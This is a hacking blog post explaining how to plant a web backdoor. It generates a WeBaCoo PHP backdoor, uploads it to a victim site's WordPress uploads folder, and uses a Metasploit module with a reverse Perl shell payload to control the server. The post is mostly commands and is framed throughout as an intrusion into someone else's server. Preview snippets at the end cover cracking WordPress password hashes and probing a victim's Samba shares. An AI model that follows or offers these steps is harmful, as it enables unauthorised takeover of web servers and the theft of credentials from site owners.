webacoo module metasploit "web backdoor"

-
Good evening readers Art Of Explo1t =)
after a long time does not make a post, this evening I again gave interesting exploitation techniques. We will utilize webacoo on metasploit module and then try to connect to a victim site which serves as a backdoor so that the attacker can freely enter into the victim's web server

Equipments : 
1. Webacoo
2. Metasploit

the operating system that I use (Kali Linux) webacoo located in the directory /usr/share/webacoo/

For Download :
# git clone https://github.com/anestisb/WeBaCoo.git


then we move the webacoo metasploit modules to directory /usr/share/metasploit-framework/modules/exploits/multi/http/
# cp /usr/share/webacoo/msf_webacoo_module.rb /usr/share/metasploit-framework/modules/exploits/multi/http/


it serves to webacoo module can be run on metasploit

# msfconsole -q
msf > search webacoo


next, we create a backdoor using webacoo that we will upload to the victim site.

# webacoo -g -o /tmp/webacoo.php
-g = generate backdoor
-ooutput filename
/tmp/webacoo.php = I store the results in the directory /tmp/ with the name weabcoo.php


I think here we have found the target and successfully uploaded a backdoor webacoo:

Next, next, back to metasploit and run webacoo:
msf > use exploit/linux/http/msf_webacoo_module
msf exploit(msf_webacoo_module) > show payloads 
msf exploit(msf_webacoo_module) > set PAYLOAD cmd/unix/reverse_perl
msf exploit(msf_webacoo_module) > set LHOST XXX.XXX.XXX
msf exploit(msf_webacoo_module) > set LPORT 4444
msf exploit(msf_webacoo_module) > set RHOST XXX.XXX.XXX.XXX or www.TARGET.com
msf exploit(msf_webacoo_module) > set URI /wp-content/uploads/webacoo.php
msf exploit(msf_webacoo_module) > check
msf exploit(msf_webacoo_module) > exploit
PAYLOAD = payload that i use
LHOST and LPORT = my IP-Address and My Port listening
RHOST = my victim url
URIWebacoo backdoor path


now we have freely entered into the victim site.
little explanation, in fact we could have gone to the victim server by using the webacoo without having to make house calls to metasploit using command :
# webacoo -t -u http://www.TARGET.com/Path/Backdoor/backdoor.php
-tEstablish remote "terminal" connection
-u = Url Backdoor


Have Fun =))


Regards :
Hidemichi-Hiroyuki a.k.a [H2]

Comments

Post a Comment

Do Not Fuckin Spamming

Popular posts from this blog

Decrypt MD5 $Wordpress

-
Image
Hy, I'm back again. I will discuss how to Decrypt a password in the form the MD5 hash wordpress. here are some examples of hash md5 encryption wordpress will we Decrypt: HASH                                                                                  PASS $P$BDHjLCEroc8ujkcs8RZxOhcE80aV5h.           : th3sweety0ne  $P$BPXNfl3mZiO7PZc4XZqFFjX7TyP7Lh.           : Pabl0-saChez $P$BqilSln8PD9SBFuTx8KkaXz62aIIvV/             : m4rim4r123 $P$BnfObieGq5ygdt0OMgwbnKvFt8EFUs.          : Gh0stTrac3 $P$B.RwpJQV8ANOyl19RGHhCaYYgJyvQM1  : *12345*0a0b0c0d many of my friends are overwhelmed when decrypt wordpress md5 hash. so are they wasting their jobs because they could not solve this one password. Equipments: 1. Hashcat             ==> Decrypt Hash 2.  Rockyou.txt       ==> Wordlists 3. Hash-Identifier   ==> to see hash mode Here I use the Operating System Kali Linux. First Step : we see the  kind of hash we will Decrypt. to facilitate us in decryption
Read more

Exploit Samba "SmbClient"

-
Image
Such as FTP (File Transfer Protocol) samba include things like getting files from the server to the local machine, putting files from the local machine to the server, retrieving directory information from the server and so on. in this case we have to get the victim to allow shared folders or files. Equipments : 1. SmbClient 2. Nmap 3. Metasploit The firstStep. scanning port the victim's ip-address using Nmap. in here that we need right port is port   445  microsoft-ds. # Nmap (Victim Ip-Address) seen in the picture above. I am lucky :) now, let us look the contents of the port # nmap -p445 --script=smb-os-discovery (Victim Ip-Address) --script=smb-os-discovery : Attempts to determine the operating system, computer name, domain, workgroup, and current time over the SMB protocol (ports 445 or 139) . seen in the picture above, it turns out the victim we use Operating System Windows 7 Ultimate.  Computer Name And NetBIOS Name is a ANONYMOUS-PC. now,
Read more

Configure Pure-FTP on Kali Linux

-
Image
FTP or file transfer protocol is a protocol that allows you to transfer files to and from a remote machine. BackTrack has pure-FTPd installed by default. FTP operates on port 21. Contents : 1. Installasion 2. Configuration 3. Run Installation Pure-Ftpd # apt-get install pure-ftpd Installation Success =)) Configure Ftpd add new group: # groupadd ftpgroup add user: # useradd -g ftpgroup -d /dev/null -s /etc ftpuser -g =  name or ID of the primary group of the new account -d = home directory of the new account -s = login shell of the new account configure store a list of users: # pure-pw useradd myftp -u ftpuser -d /home/ftp/pub/myftp myftp = your ftp username please enter you password. configure puredb database file # pure-pw mkdb The next entry to the directory /etc/pure-ftpd/auth/ # cd /etc/pure-ftpd/auth then Create hard links by default: # ln -s ../conf/PureDB 60pdb then, make a directory /ftp # mkdir /home/ft
Read more